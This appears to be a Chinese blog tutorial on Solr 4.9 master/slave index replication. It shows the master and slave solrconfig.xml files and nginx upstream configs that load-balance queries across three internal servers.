1、3台solr服务器,采用主从复制的策略实现索引文件的同步,主从就是设置集群中一台server为主,另外为从服务器,从服务器定时从主服务器中同步数据
主服务器的solr配置(solrconfig.xml)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
|
<?xml version="1.0" encoding="UTF-8"?>
<!--
 Licensed to the Apache Software Foundation (ASF) under one or more
 contributor license agreements. See the NOTICE file distributed with
 this work for additional information regarding copyright ownership.
 The ASF licenses this file to You under the Apache License, Version 2.0
 (the "License"); you may not use this file except in compliance with
 the License. You may obtain a copy of the License at
     http://www.apache.org/licenses/LICENSE-2.0
 Unless required by applicable law or agreed to in writing, software
 distributed under the License is distributed on an "AS IS" BASIS,
 WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 See the License for the specific language governing permissions and
 limitations under the License.
-->
<!--
 Stripped-down solrconfig.xml for the replication MASTER node.
 This is a simple example, *not* a good template to work from.
-->
<config>
  <luceneMatchVersion>4.9</luceneMatchVersion>

  <!-- The DirectoryFactory to use for indexes.
       solr.StandardDirectoryFactory (the default) is filesystem based.
       solr.RAMDirectoryFactory is memory based, not persistent, and
       does NOT work with replication. -->
  <directoryFactory name="DirectoryFactory"
                    class="${solr.directoryFactory:solr.StandardDirectoryFactory}"/>

  <!-- Index data directory; falls back to the default when the
       solr.core0.data.dir system property is unset. -->
  <dataDir>${solr.core0.data.dir:}</dataDir>

  <!-- Classic (non-managed) schema: Solr reads schema.xml directly.
       To enable the dynamic schema REST APIs instead, use:
         <schemaFactory class="ManagedIndexSchemaFactory">
           <bool name="mutable">true</bool>
           <str name="managedSchemaResourceName">managed-schema</str>
         </schemaFactory>
       With ManagedIndexSchemaFactory, Solr loads the schema from the
       resource named in 'managedSchemaResourceName' rather than from
       schema.xml, and the managed schema must NOT be hand edited. -->
  <schemaFactory class="ClassicIndexSchemaFactory"/>

  <updateHandler class="solr.DirectUpdateHandler2">
    <!-- Transaction log; required by the realtime-get handler below. -->
    <updateLog>
      <str name="dir">${solr.core0.data.dir:}</str>
    </updateLog>
  </updateHandler>

  <!-- Realtime get handler: returns the latest stored fields of any
       document without needing a commit or a new searcher. Relies on
       the updateLog feature being enabled. -->
  <requestHandler name="/get" class="solr.RealTimeGetHandler">
    <lst name="defaults">
      <str name="omitHeader">true</str>
    </lst>
  </requestHandler>

  <!-- MASTER replication config: slaves poll this handler. -->
  <requestHandler name="/replication" class="solr.ReplicationHandler">
    <lst name="master">
      <!-- Replicate on 'startup', 'commit' and 'optimize'. -->
      <str name="replicateAfter">startup</str>
      <str name="replicateAfter">commit</str>
      <str name="replicateAfter">optimize</str>
      <!-- Optionally create a backup after an event (not required
           for replication):
           <str name="backupAfter">optimize</str> -->
      <!-- Configuration files to replicate, comma separated. -->
      <str name="confFiles">schema.xml,stopwords.txt</str>
      <!-- How long a commit point is reserved for slaves to fetch;
           the default is 10 seconds, so this is usually unnecessary. -->
      <str name="commitReserveDuration">00:00:10</str>
    </lst>
  </requestHandler>

  <requestDispatcher handleSelect="true">
    <requestParsers enableRemoteStreaming="false"
                    multipartUploadLimitInKB="2048"
                    formdataUploadLimitInKB="2048"/>
  </requestDispatcher>

  <requestHandler name="standard" class="solr.StandardRequestHandler" default="true"/>
  <requestHandler name="/analysis/field" startup="lazy" class="solr.FieldAnalysisRequestHandler"/>
  <requestHandler name="/update" class="solr.UpdateRequestHandler"/>
  <requestHandler name="/admin/" class="org.apache.solr.handler.admin.AdminHandlers"/>

  <!-- Ping handler, disabled on the master in this setup:
       <requestHandler name="/admin/ping" class="solr.PingRequestHandler">
         <lst name="invariants">
           <str name="q">solrpingquery</str>
         </lst>
         <lst name="defaults">
           <str name="echoParams">all</str>
         </lst>
       </requestHandler>
  -->

  <queryResultWindowSize>1500</queryResultWindowSize>
  <queryResultMaxDocsCached>150</queryResultMaxDocsCached>
  <queryResultCache class="solr.LRUCache"
                    size="15000"
                    initialSize="15000"
                    autowarmCount="1500"/>

  <!-- Config for the admin interface. -->
  <admin>
    <defaultQuery>solr</defaultQuery>
  </admin>
</config>
|
从服务器配置(solrconfig.xml)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
|
<?xml version="1.0" encoding="UTF-8"?>
<!--
 Licensed to the Apache Software Foundation (ASF) under one or more
 contributor license agreements. See the NOTICE file distributed with
 this work for additional information regarding copyright ownership.
 The ASF licenses this file to You under the Apache License, Version 2.0
 (the "License"); you may not use this file except in compliance with
 the License. You may obtain a copy of the License at
     http://www.apache.org/licenses/LICENSE-2.0
 Unless required by applicable law or agreed to in writing, software
 distributed under the License is distributed on an "AS IS" BASIS,
 WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 See the License for the specific language governing permissions and
 limitations under the License.
-->
<!--
 Stripped-down solrconfig.xml for a replication SLAVE node.
 This is a simple example, *not* a good template to work from.
-->
<config>
  <luceneMatchVersion>4.9</luceneMatchVersion>

  <!-- The DirectoryFactory to use for indexes.
       solr.StandardDirectoryFactory (the default) is filesystem based.
       solr.RAMDirectoryFactory is memory based, not persistent, and
       does NOT work with replication. -->
  <directoryFactory name="DirectoryFactory"
                    class="${solr.directoryFactory:solr.StandardDirectoryFactory}"/>

  <!-- Index data directory; falls back to the default when the
       solr.core0.data.dir system property is unset. -->
  <dataDir>${solr.core0.data.dir:}</dataDir>

  <!-- Classic (non-managed) schema: Solr reads schema.xml directly.
       To enable the dynamic schema REST APIs instead, use:
         <schemaFactory class="ManagedIndexSchemaFactory">
           <bool name="mutable">true</bool>
           <str name="managedSchemaResourceName">managed-schema</str>
         </schemaFactory>
       With ManagedIndexSchemaFactory, Solr loads the schema from the
       resource named in 'managedSchemaResourceName' rather than from
       schema.xml, and the managed schema must NOT be hand edited. -->
  <schemaFactory class="ClassicIndexSchemaFactory"/>

  <updateHandler class="solr.DirectUpdateHandler2">
    <!-- Transaction log; required by the realtime-get handler below. -->
    <updateLog>
      <str name="dir">${solr.core0.data.dir:}</str>
    </updateLog>
  </updateHandler>

  <!-- Realtime get handler: returns the latest stored fields of any
       document without needing a commit or a new searcher. Relies on
       the updateLog feature being enabled. -->
  <requestHandler name="/get" class="solr.RealTimeGetHandler">
    <lst name="defaults">
      <str name="omitHeader">true</str>
    </lst>
  </requestHandler>

  <!-- SLAVE replication config: polls the master and pulls the index. -->
  <requestHandler name="/replication" class="solr.ReplicationHandler" startup="lazy">
    <lst name="slave">
      <!-- Fully qualified URL of the master's replication handler.
           Can also be passed as a request param to the fetchindex command. -->
      <str name="masterUrl">http://10.10.53.235:8080/solr/core0/replication</str>
      <!-- Poll interval (HH:mm:ss). If absent, the slave does not poll
           automatically, but a fetchindex can still be triggered from
           the admin UI or the HTTP API. -->
      <str name="pollInterval">00:10:00</str>
      <!-- THE FOLLOWING PARAMETERS ARE USUALLY NOT REQUIRED. -->
      <!-- Compression for index file transfer: internal|external.
           'external' requires the master to honour the accept-encoding
           header (see http://wiki.apache.org/solr/SolrHttpCompression);
           'internal' is handled automatically. Use only on low-bandwidth
           links - it can actually slow replication down on a LAN. -->
      <str name="compression">internal</str>
      <!-- Connect/read timeouts used when downloading index files from
           the master. Defaults are 5000ms and 10000ms; only override
           them on extremely slow or high-latency links. -->
      <str name="httpConnTimeout">5000</str>
      <str name="httpReadTimeout">10000</str>
      <!-- If HTTP Basic auth is enabled on the master, credentials can
           be configured here as well. -->
    </lst>
  </requestHandler>

  <requestDispatcher handleSelect="true">
    <requestParsers enableRemoteStreaming="false"
                    multipartUploadLimitInKB="2048"
                    formdataUploadLimitInKB="2048"/>
  </requestDispatcher>

  <requestHandler name="standard" class="solr.StandardRequestHandler" default="true"/>
  <requestHandler name="/analysis/field" startup="lazy" class="solr.FieldAnalysisRequestHandler"/>
  <requestHandler name="/update" class="solr.UpdateRequestHandler"/>
  <requestHandler name="/admin/" class="org.apache.solr.handler.admin.AdminHandlers"/>

  <!-- Health-check handler, enabled on slaves so the load balancer
       can probe them. -->
  <requestHandler name="/admin/ping" class="solr.PingRequestHandler">
    <lst name="invariants">
      <str name="q">solrpingquery</str>
    </lst>
    <lst name="defaults">
      <str name="echoParams">all</str>
    </lst>
  </requestHandler>

  <queryResultWindowSize>1500</queryResultWindowSize>
  <queryResultMaxDocsCached>150</queryResultMaxDocsCached>
  <queryResultCache class="solr.LRUCache"
                    size="15000"
                    initialSize="15000"
                    autowarmCount="1500"/>

  <!-- Config for the admin interface. -->
  <admin>
    <defaultQuery>solr</defaultQuery>
  </admin>
</config>
|
2、solrj实现索引创建和查询
由于采用了主从架构,所以创建直接在主服务器上完成就可以,从服务器会自动同步
查询时前端用nginx做代理,达到负载均衡的效果
nginx的配置如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
|
# Upstream pool: all three Solr servers (master + two slaves)
# take part in query load balancing (default round-robin).
upstream localhost{
server 10.10.53.177:8080;
server 10.16.15.121:8080;
server 10.10.53.235:8080;
}
server
{
listen 80;
server_name 10.10.53.235;
root /home/html;
charset utf-8;
# Shared proxy settings (headers, timeouts, buffers).
include proxy.conf;
# Disabled rewrite: map getAllPlaybill.json requests to a static
# per-date text file instead of proxying them.
# location ~ ^/getAllPlaybill.json$
# {
# if ($query_string ~* "playbillDate=(.*)&mdv=(.*)$") {
# set $playbillDate $1;
# rewrite ^/getAllPlaybill\.json http://10.10.53.235/getAllPlaybill_$playbillDate.txt break;
# }
# }
# Proxy everything else to the Solr upstream pool defined above.
# NOTE(review): "localhost" here is the upstream name, not the host.
location ~ /
{
proxy_pass http://localhost;
}
# Add expires header for static content
location ~ .*\.(gif|jpg|jpeg|png|bmp|swf)$
{
access_log off;
expires 10d;
}
location ~ .*\.(js|css)$
{
access_log off;
expires 1h;
}
}
|
一般情况下,可以设置主写从查,这时候在检索的时候就不去主服务器上,配置如下:
1
2
3
4
5
|
# Upstream pool for "write to master, read from slaves": only the two
# slaves serve queries; the master (10.10.53.235) is commented out.
upstream localhost{
server 10.10.53.177:8080;
server 10.16.15.121:8080;
# server 10.10.53.235:8080;  # master excluded - just comment this line out
}
|